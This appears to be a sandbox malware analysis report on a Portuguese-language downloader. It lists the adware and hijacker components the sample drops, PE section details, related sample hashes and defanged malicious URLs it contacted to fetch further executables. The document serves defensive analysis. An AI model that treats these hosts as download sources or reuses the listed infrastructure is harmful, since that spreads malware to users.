%Program Files%\XTab\searchProvider.xml (8 bytes)
%Program Files%\XTab\web\_locales\zh-CN\messages.json (3 bytes)
%Program Files%\XTab\web\_locales\fr-BE\messages.json (3 bytes)
%Program Files%\XTab\web\_locales\pl\messages.json (3 bytes)
%Program Files%\XTab\web\ver.txt (47 bytes)
%Program Files%\XTab\web\img\icon128.png (9 bytes)
%Program Files%\XTab\web\_locales\vi-VI\messages.json (4 bytes)
%Program Files%\XTab\web\_locales\es-419\messages.json (3 bytes)
%Program Files%\XTab\skin\input_bk.png (2 bytes)
%Program Files%\XTab\web\_locales\ru\messages.json (4 bytes)
%Program Files%\XTab\CmdShell.exe (1685 bytes)
%Program Files%\XTab\BrowerWatchCH.dll (23 bytes)
%Program Files%\XTab\web\_locales\fr-FR\messages.json (3 bytes)
%Program Files%\XTab\skin\logo.png (5 bytes)
%Program Files%\XTab\web\js\jquery-1.11.0.min.js (4726 bytes)
%Program Files%\XTab\web\_locales\zh-TW\messages.json (3 bytes)
%Program Files%\XTab\web\_locales\en-US\messages.json (3 bytes)
%Program Files%\XTab\web\_locales\fr-LU\messages.json (3 bytes)
%Program Files%\XTab\web\js\common.js (2 bytes)
%Program Files%\XTab\web\_locales\it-IT\messages.json (4 bytes)
%Program Files%\XTab\skin\conf.xml (8 bytes)
%Program Files%\XTab\skin\btn.png (2 bytes)
%Program Files%\XTab\skin\conf_back.png (1623 bytes)
%Program Files%\XTab\web\js\library.js (4216 bytes)
%Program Files%\XTab\web\_locales\tr-TR\messages.json (4 bytes)
%Program Files%\XTab\install.data (93 bytes)
%Program Files%\XTab\skin\rigth_arrow.png (2 bytes)
%Program Files%\XTab\uninstall.exe (1343 bytes)
%Program Files%\XTab\web\img\google_trends.png (7 bytes)
%Program Files%\XTab\web\data.html (20 bytes)
%Program Files%\XTab\IeWatchDog.dll (20 bytes)
%Program Files%\XTab\skin\radio_2.png (3 bytes)
%Program Files%\XTab\web\js\ga.js (1568 bytes)
%Program Files%\XTab\ffsearch_toolbar!1.0.0.1028.xpi (15 bytes)
%Program Files%\XTab\web\js\jquery.autocomplete.js (12 bytes)
%Program Files%\XTab\web\js\xagainit2.0.js (4 bytes)
%Program Files%\XTab\web\_locales\pt-BR\messages.json (4 bytes)
%Program Files%\XTab\web\_locales\it-CH\messages.json (3 bytes)
%Program Files%\XTab\skin\radio_1.png (3 bytes)
%Program Files%\XTab\msvcp110.dll (16990 bytes)
%Program Files%\XTab\web\_locales\fr-CA\messages.json (3 bytes)
%Program Files%\XTab\web\indexIE.html (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm1C.tmp\System.dll (11 bytes)
%Program Files%\XTab\web\indexIE8.html (1794 bytes)
%Program Files%\XTab\web\_locales\ru-MO\messages.json (4 bytes)
%Program Files%\XTab\web\img\icon48.png (3 bytes)
%Program Files%\XTab\skin\close.png (3 bytes)
%Program Files%\XTab\skin\about.png (4 bytes)
%Program Files%\XTab\web\js\js.js (18 bytes)
%Program Files%\XTab\skin\settings.png (5 bytes)
%Program Files%\XTab\web\img\icon16.png (628 bytes)
%Program Files%\XTab\skin\about_bk.png (1436 bytes)
%Program Files%\XTab\SupTab.dll (15406 bytes)
%Program Files%\XTab\web\js\xagainit-ie8.js (4 bytes)
%Program Files%\XTab\msvcr110.dll (21280 bytes)
%Program Files%\XTab\ProtectService.exe (5309 bytes)
%Program Files%\XTab\skin\main.xml (4 bytes)
%Program Files%\XTab\web\main.css (19 bytes)
%Program Files%\XTab\HPNotify.exe (17941 bytes)
%Program Files%\XTab\conf (1694 bytes)
%Program Files%\XTab\web\img\loading.gif (5 bytes)
%Program Files%\XTab\skin\btn_apply.png (6 bytes)
%Program Files%\XTab\web\img\logo32.ico (4 bytes)
%Program Files%\XTab\BrowserAction.dll (33992 bytes)
%Program Files%\XTab\web\_locales\fr-CH\messages.json (3 bytes)
%Program Files%\XTab\BrowerWatchFF.dll (23 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm18.tmp\SimpleSC.dll (1856 bytes)
%Program Files%\GOSafer\nfregdrv.exe (1552 bytes)
%Program Files%\GOSafer\gosafer.exe (15536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg17.tmp (66910 bytes)
%System%\drivers\gosaferdrv.sys (55 bytes)
%Program Files%\GOSafer\uninst.exe (1793 bytes)
%Program Files%\GOSafer\ProtocolFilters.dll (9320 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm18.tmp\SelfDel.dll (5 bytes)
%Program Files%\GOSafer\libeay32.dll (35507 bytes)
%Program Files%\GOSafer\ssleay32.dll (12088 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm18.tmp\System.dll (11 bytes)
%Program Files%\GOSafer\nfapi.dll (4992 bytes)
%Program Files%\GOSafer\gosaferdrv.sys (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\tmp\wpm_v20.0.0.1953_0302.exe (3566 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\tmp\XTab_Setup2121.exe (17629 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\tmp\479.db (190 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WebDataJs (40 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\bg1.png (2 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\Thumbs.db (27 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\UninstallManager.exe (14022 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\uninstallDlg2.xml (15 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\code\code1.jpg (5 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\loading_light.png (139 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\code\code4.jpg (5 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\479.json (512 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (1 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Internet Explorer.lnk (993 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\code\code5.jpg (4 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\code\code3.jpg (5 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\bk_shadow.png (3 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\code\Thumbs.db (42 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\MessageBox.xml (3 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\button1.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\loading_bg.png (159 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\scrollbar.bmp (37 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\checked.png (222 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\checkbox_select.png (783 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\unchecked.png (135 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\code\code6.jpg (5 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\close.png (3 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\code\code2.jpg (4 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\min.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\checkbox.png (545 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\button.png (3 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\bg.png (673 bytes)
%Program Files%\CashReminder\ssleay32.dll (12088 bytes)
%Program Files%\CashReminder\nfapi.dll (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw9.tmp\System.dll (11 bytes)
%System%\drivers\crfilterdrv.sys (55 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg8.tmp (67341 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw9.tmp\SelfDel.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw9.tmp\SimpleSC.dll (1856 bytes)
%Program Files%\CashReminder\libeay32.dll (35507 bytes)
%Program Files%\CashReminder\uninstall.exe (1568 bytes)
%Program Files%\CashReminder\nfregdrv.exe (1552 bytes)
%Program Files%\CashReminder\CashReminder.exe (15536 bytes)
%Program Files%\CashReminder\crfilterdrv.sys (1856 bytes)
%Program Files%\CashReminder\ProtocolFilters.dll (9320 bytes)
%WinDir%\Temp\ActSys\SSL\NJax Intermediate SSL.cer (782 bytes)
%WinDir%\Temp\P_RuleList.txt (180 bytes)
%WinDir%\Temp\ActSys\SSL\NJax Intermediate SSL.pvk (1 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\rules[1].txt (180 bytes)
%Program Files%\WNet\nfregdrv.exe (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz10.tmp\SelfDel.dll (5 bytes)
%Program Files%\WNet\WNet.exe (15168 bytes)
%Program Files%\WNet\uninst.exe (1720 bytes)
%Program Files%\WNet\ssleay32.dll (12088 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsyF.tmp (68079 bytes)
%System%\drivers\ssfilterdrv.sys (55 bytes)
%Program Files%\WNet\ProtocolFilters.dll (9320 bytes)
%Program Files%\WNet\nfapi.dll (4992 bytes)
%Program Files%\WNet\libeay32.dll (35507 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz10.tmp\SimpleSC.dll (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz10.tmp\System.dll (11 bytes)
%Program Files%\WNet\ssfilterdrv.sys (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\amipixel.cfg (107 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KPERCTIR\index[1].htm (2203 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\amipb[1].js (34728 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\amitest.txt (27 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\310714_br[1].exe (64683 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\registry.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\310714_am2[1].exe (20504 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\310714_cr[1] (64392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\nsWeb.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\310714_gs[1] (64683 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_br.exe (64683 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\s9[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_ps.exe (33816 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_nj.exe (110758 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KPERCTIR\310714_is[1] (44832 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_am2.exe (20504 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\310714_a9[1].exe (32816 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_a9.exe (32816 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso2.tmp (3526 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\310714_is.exe (44832 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_gs.exe (64683 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KPERCTIR\verificar_ip[1].php (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KPERCTIR\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\240714_ps[1].exe (33816 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2N_mb_1.exe (2696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\291014_nj[1].exe (110758 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\310714_mb[1] (2696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_cr.exe (64392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\quick_searchff#5.4.10.xpi (6360 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\loading_light.png (139 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\min.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code2.jpg (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code3.jpg (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\one.zip (127551 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code5.jpg (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\unchecked.png (135 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\uninstallDlg2.xml (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\UninstallManager.exe (60186 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\DataBase (26688 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\Thumbs.db (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\button.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\bk_shadow.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\close.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code4.jpg (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\button1.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\QQBrowser.exe (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\bg1.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\sweetsearch!1.0.0.1031.xpi (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\Thumbs.db (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\1[1].zip (229748 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\scrollbar.bmp (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\FBFDE863-3C17-4B82-A5D1-9B8ED5BE6B40.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\checked.png (222 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\tmp\RegWrite.exe (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\loading_bg.png (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\checkbox.png (545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code6.jpg (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\2[1].zip (325830 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\checkbox_select.png (783 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\479.json (512 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\conf (79 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code1.jpg (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\bg.png (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\two.zip (255743 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\MessageBox.xml (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\QQBrowserFrame.dll (3616 bytes)
%WinDir%\Temp\CashReminder\mfs1A.tmp (408297 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\QLSNQ10Z\stores[1].htm (687 bytes)
%WinDir%\Temp\P_StoreList.txt (687 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\rules[1].txt (265 bytes)
%WinDir%\Temp\G_CheckUpdate.txt (8 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\rules[2].txt (16 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\update[1].htm (8 bytes)
%WinDir%\Temp\G_RuleList.txt (16 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\812Z098J\rules[1].txt (94 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-5M11A.tmp\310714_is.tmp (57 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\awhC.tmp (171 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\awhD.tmp (149648 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name:
Product Name:
Product Version:
Legal Copyright: q2g54WndLShXYB3BIA5JVf
Legal Trademarks:
Original Filename: q2g54WndLShXYB3BIA5J
Internal Name:
File Version: 7.8.5.9
File Description: Download da Internet
Comments: q2g54WndLShXYB3B
Language: English (United States)
Company Name: Product Name: Product Version: Legal Copyright: q2g54WndLShXYB3BIA5JVfLegal Trademarks: Original Filename: q2g54WndLShXYB3BIA5JInternal Name: File Version: 7.8.5.9File Description: Download da InternetComments: q2g54WndLShXYB3BLanguage: English (United States)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 23130 | 23552 | 4.44841 | 0bc2ffd32265a08d72b795b18265828d |
.rdata | 28672 | 4496 | 4608 | 3.59163 | f179218a059068529bdb4637ef5fa28e |
.data | 36864 | 110488 | 1024 | 3.26405 | 975304d6dd6c4a4f076b15511e2bbbc0 |
.ndata | 147456 | 40960 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rsrc | 188416 | 3192 | 3584 | 2.80742 | 08b8765ebae57a11c951f075e7900c43 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 184
3e3cd94c5e6d1f1c66683d7bc29aaef7
fd798e8d7d88dc163e681f81144854ea
3330fd55d29f0d1fd88c36931d7e94b6
98dfb01f27d0d00488f3347c7bb0ef36
c6e528a31cafb6b2d33443512b8efc1f
c58fc13ddf9b7a2e8ca99386b9eb6c8f
e4c4cff1094fbff72aeb3e6827f69bc4
7241dc3f2a0b6ea61f4df85d751d7c03
f83816c5fd74f87663c27bc857c54c20
123d3a4485c9649b9f9ee387279725fa
2a2056e64caf8b79177ee628e97db231
641edaabefd4f46a0dc8caa8dae297cd
4363940d7485ca19ff5177e8c83389cc
173ab471842f45ba225c672a966fdfcc
7fe602114a76666ea973a5a22b4bceb7
55f6941611e6b5b5afe7a70dbb1b8bdb
ffe87a74a9ce198b2266dd8fdd67a3a3
5623ca722006ab792b8de36f6d6633ea
415ec116714b68e2101e52ee23129617
3156d35e3cfe3cd058e14cf42ec326eb
aac8203e17f1ba0429eb68f05f00ef5d
a8647af5a88fc0c6cfcf258906f302f4
2bec18f54db5c51eac6e210dba1ff40b
2143cb5872145360aa68b92bd7951843
5e0826607d791fed6050acb832441c67
Network Activity
URLs
URL | IP |
---|---|
hxxp://198.50.209.4/registro/icone_cadeado.gif | |
hxxp://198.50.209.4/registro/top-line.gif | |
hxxp://www.nowtake.me/8Hk4o | |
hxxp://www.nowtake.me/010914s/010914i.htm | |
hxxp://www.nowtake.me/010914s/verificar_ip.php | |
hxxp://t1.extreme-dm.com/i.gif | |
hxxp://www.nowtake.me/310714d/240714_ps.exe?aleaTokenID=q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N | |
hxxp://t1.extreme-dm.com/s9.g?login=pcofferp&jv=y&j=y&srw=1276&srb=32&l=http://www.4threquest.me/registro/310113f8.htm | |
hxxp://mobimidia.com/mobile/MobiMidia_validation.js | |
hxxp://mobimidia.com/mobile/libacess_js.php?idm=R0JDNlBNS1RPRDo5MjMwMDA= | |
hxxp://mobimidia.com/mobile/mt-core.js | |
hxxp://www.nowtake.me/310714d/310714_a9.exe?aleaTokenID=q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N | |
hxxp://www.nowtake.me/310714d/310714_am2.exe?aleaTokenID=q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N | |
hxxp://www.nowtake.me/310714d/310714_br.exe?q2g54WndLShXYB3BIA5JVfobjOB2N=q2g54WndLShXYB3BIA5JVfobjOB2N | |
hxxp://xa.xingcloud.com/v4/sof-installer/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action1=xa.geoip&action2=visit&action3=pcm.visit.istartsurf&update1=ref,pcm&update2=identifier,installer&update3=version,6.3.7602.2008&update4=nation,us&update5=language,en | |
hxxp://www.tjepgz.cc/3517/1 | |
hxxp://www.tjepgz.cc/files/zip_r3/3517_285376eeff6d14f058406e7986125234/1.zip | |
hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/namen.php | |
hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/tdownload.php | |
hxxp://www.nowtake.me/310714d/291014_nj.exe?q2g54WndLShXYB3BIA5JVfobjOB2N=q2g54WndLShXYB3BIA5JVfobjOB2N | |
hxxp://www.nowtake.me/registro/carregando.gif | |
hxxp://plainsavingscenter.com/mg?alpha=HyZPRnotGAhqT14bYGx1HmIcS3ofYE03fWFKOXdhHXUOIX0+L1I0EmhiTjJaMDJXZwQZUlU2MQZRaxkdDC51SwhncVMJcU8OQzZrVi9y | |
hxxp://www.nowtake.me/310714d/310714_gs.exe?q2g54WndLShXYB3BIA5JVfobjOB2N=q2g54WndLShXYB3BIA5JVfobjOB2N | |
hxxp://related.deals/services/stores?dummy=526 | |
hxxp://related.deals/services/rules?dummy=212 | |
hxxp://related.deals/services/update/1.0.0/iCQPRHeOJjIUg2xbskzYtHYRcOspD6WL/120 | |
hxxp://xa.xingcloud.com/v4/sof-installer/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action=pcm.dlzip1.istartsurf.finish,9 | |
hxxp://plainsavingscenter.com/fp?alpha=UHAKO1kqRR0MZFxoJRFWUTRZNllQLBxKGHdxWy8GFiAEb0pGWwdKP1BGZToMDnt+bFElG2A/bkprKRY8VzgCOSk8BjouWnBZH08abykoWDgPbRFvGER0QkZRIhoKekJQIFMwXQwKCkk3WjsQPBUNbg9vI1cCYToaUXdbZ01DdzVlIlgPD3YdVDEZOBwoJGxSXQJuWXoCF2ULRklwHhhwQUtwUz1YVxwLRCdTOwZsDBxlWX52WRZnOQ0eK1YHFwpwKGJnLhYddAdfc0BhW3UlP0UndhgaOEcSeF1HWCceDnlHQHAVcVFrQBwIcgtmGz99C2ALGiBWGxA4HD1rUmM5VTgHPitMb0kuXghdGD16X3l/VWUORzlZXjw= | |
hxxp://goo.gl/Bw14Po | |
hxxp://plainsavingscenter.com/ii?alpha=U2xSOyMpaRAdPUgWfREsUigBNiNTMF4TLnZUE29sDGkDO3dGUF8tEQB3EC0RXjwOMAgQDGV/NA0TV2o3VjgrJVU5cBEhOwMzQT50KXp9FixQITs5KQYpBhVhM0EHdDhdP3peIQISTzxPJVtTOXR6fEocLiAYIU1jSWh3FTxTSFs4JCszViohFHZJPHYuaTpVJQ9xUnR+RmwHRSUzVgUvTRdiA3RzTlAOEg8EOBpoJH04CAhSVQQ8J2NGagN5MFM4LC0CaDFseHYPVScoKWwobRV0HBcNNCsaLkRbMyYATStmEStRbmBTUl8wFAJsEX4tWT5HCQYNTmN+Il8CY3dVFGZ4bhZ+N095dF4gAms0bDV7CzEbYFF0fltrAUcjNUEFO3kMbls9ZldDCV1HQS1QPWRQOQs/AQQXSWc2EzNAPyVOXHBiEWg6AERhU3QRfW85MmJYJQcuVipyDH9WAS4sAkx4P1crU3wrBhBYTT5bLEc3cXlwJGdVUBoqeT4bZ3U2aRVsOG8KYDAdU1ttTjUoInAxd1hVYh8qG2kRLQohXmJTEiwvM2RMaWNXTEI0OSQ+NmwwW2ojLAYVTyp5OkJ8VjlmWzg4cVg8QyJiPCYQEA== | |
hxxp://plainsavingscenter.com/if?alpha=VmkaOm5eUxUWBXAqNRBhVy1JN25WNRYSY3NRW24hCWxLOjpDVRcsXAVyWCxcWzlGMUUVCS1+eQgWH2t6Uz1jJBg8dVkgdgY2CT85LH81F2FVJHM4ZAMsThQsNkRPdXVYOjJfbAcXBz0CIF4bODl/eQIdYyUdaUwuTG0/FHFWTRM5aS4+CysLX2BQY0J0MCgvNUgpfyxrBD8XUDNmChxuNF06Ri1uHRUeUgFSNQc/Ogp9GXlGA0kGenNHNh4uOA9jJG8ObD4OVCpYUwE5JSp3bl1sFGsZbjNCehgTMVxYS3UXMy4Zby9KVU9BZw11UmN4SWMPbBBLTS18OhUsDTM6XkE/aVpnKAdwLBdSVWFvdS4vRAR0ZXwpbRY5DAU3f1lJJGIWbQRvMlxLCkYQUTUHIj0Mfx9/UQNdMmF/H38LNysILGwqGyZrTnkrW2RSaDZfNzsINVctDHNXHjULEzowZFwpNgV7Xzo1RRgeWl5Wawt1KVs5EmYSSh50OjoXPkZmeFk8FTAaMWFbUGJ0PAY8OzwpMwBhYiRAKGdWOBAbMC1zZhcMIS4SczZQGG4/bypaEGh7BxliKEMUSmRedQgrDjckQ0USTwhAOhpyeHN3VXlufnIFLnojEQ== | |
hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/index.php | |
hxxp://dyno3mlj15jgv.cloudfront.net/V19/amipb.js | |
hxxp://log.very911.com/install.gif?bundle=istartsurf&ptid=pcm&uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001 | |
hxxp://xa.xingcloud.com/v4/sof-installer/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action=pcm.installer.istartsurf.regok | |
